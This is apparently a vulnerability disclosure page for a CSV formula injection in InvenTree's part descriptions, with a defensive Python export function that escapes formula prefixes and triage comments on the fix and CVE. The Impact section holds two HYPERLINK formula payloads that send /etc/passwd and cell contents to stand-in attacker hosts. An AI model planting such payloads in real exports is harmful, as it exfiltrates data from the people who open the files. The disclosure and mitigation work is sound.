Formula Injection Part Description in inventree/inventree

Valid

Reported on

Jun 11th 2022


Description

Formula Injection/CSV Injection in inventree due to Improper Neutralization of Formula Elements in CSV File.

Proof of Concept

Video PoC link: https://drive.google.com/file/d/1mf_BTUDS1iZ4uJfBpc56_8WgpdZdN5_f/view?usp=sharing

Impact

Successful exploitation can lead to impacts such as client-side command injection, code execution, or remote exfiltration of contained confidential data. By constructing payloads such as:

=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1));
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")

An attacker can gain access to the /etc/passwd system file.
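The neutralization whose absence the description names, as a defensive example added here; it is not InvenTree's code and not the fix shipped in 0.7.2. The function names and sample rows are constructed for illustration, and the prefix list and apostrophe escaping follow OWASP's CSV Injection guidance.

```python
import csv
import io

# Leading characters that spreadsheet applications interpret as the start of a
# formula (the set listed in OWASP's CSV Injection guidance).
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def is_plain_number(text):
    """True for strings such as "-5" or "+3.2" that are numbers, not formulas."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def neutralize_cell(value):
    """Prefix formula-like strings with an apostrophe so they load as text."""
    if not isinstance(value, str) or not value:
        return value  # ints, floats, None and "" are written unchanged
    looks_like_formula = value.lstrip(" ").startswith(FORMULA_PREFIXES)
    if looks_like_formula and not is_plain_number(value):
        return "'" + value
    return value


def export_parts_csv(rows, header):
    """Serialize rows to CSV, neutralizing every cell before it is written."""
    buf = io.StringIO()
    # QUOTE_ALL keeps embedded commas, quotes and newlines inside one field.
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample data: user-controlled "description" values on part records.
SAMPLE_PARTS = [
    ["Resistor 10k", "0603 thick film", -5],
    ["Capacitor", '=HYPERLINK("http://example.invalid/?x="&A3,"Click me")', 12],
    ["Header", "-40 to +85 C rated", "-2.5"],
]

if __name__ == "__main__":
    print(export_parts_csv(SAMPLE_PARTS, ["name", "description", "stock"]))
```

Free text that legitimately starts with `-` or `+` (the third sample row) is also prefixed; that over-escaping is the accepted cost of treating every non-numeric formula-like cell as text.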


We are processing your report and will contact the inventree team within 24 hours. a year ago
Oliver validated this vulnerability a year ago

Thanks for reporting this, we were not aware of this vulnerability. It will be remedied ASAP

saharshtapi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Oliver marked this as fixed in 0.7.2 with commit 26bf51 a year ago
Oliver has been awarded the fix bounty
This vulnerability will not receive a CVE
api.py#L883 has been validated
saharshtapi
a year ago

Researcher


@admin Can you assign CVE?

Jamie Slome
a year ago

Admin


CVE assigned 👏
